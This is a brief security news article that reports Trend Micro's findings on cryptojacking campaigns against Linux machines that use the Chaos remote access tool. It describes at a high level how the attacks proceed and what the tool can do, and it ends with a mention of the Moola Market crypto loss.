The use of the Chaos remote administrative tool (RAT) has been identified as a key factor in enhancing cryptocurrency mining attacks on Linux systems, according to a recent report by Trend Micro security researchers.
In their findings, the experts highlighted how threat actors are leveraging the Chaos RAT to streamline their efforts in targeting Linux machines for cryptojacking. This tactic mirrors previous instances where cloud computing instances were also exploited by groups like TeamTNT.
The attack methodology involves a multi-phased approach, starting with the elimination of competing malware, security tools, and cloud middleware. Subsequently, the attackers establish persistence and execute payloads, often deploying a Monero (XMR) cryptocurrency miner as the final payload.
Trend Micro noted that more sophisticated threats have demonstrated the ability to infect a larger number of devices. In a recent case from November 2022, the researchers intercepted an attack that utilized the Chaos RAT, an advanced tool based on an open-source project.
One notable aspect of the new wave of attacks is the decentralized hosting of downloader scripts and payloads in various locations. This strategy ensures the continuity and spread of the malicious campaign. The main server identified in these attacks was traced back to Russia.
From a technical perspective, the Chaos RAT is a Go-compiled binary with a range of functionalities, including executing reverse shells, file downloads and uploads, and capturing screenshots. This tool adds a layer of complexity to the cryptocurrency mining malware, highlighting the evolving tactics of cloud-based threat actors.
Trend Micro emphasized the importance of heightened vigilance from both organizations and individuals in light of these developments. The integration of a sophisticated RAT into crypto mining campaigns underscores the need for robust security measures to combat evolving threats.
The release of Trend Micro’s advisory coincides with a recent security incident at Moola Market, a decentralized finance platform that suffered losses of up to $9 million in cryptocurrency. This serves as a stark reminder of the vulnerabilities in the crypto space and the ongoing efforts of threat actors to exploit them.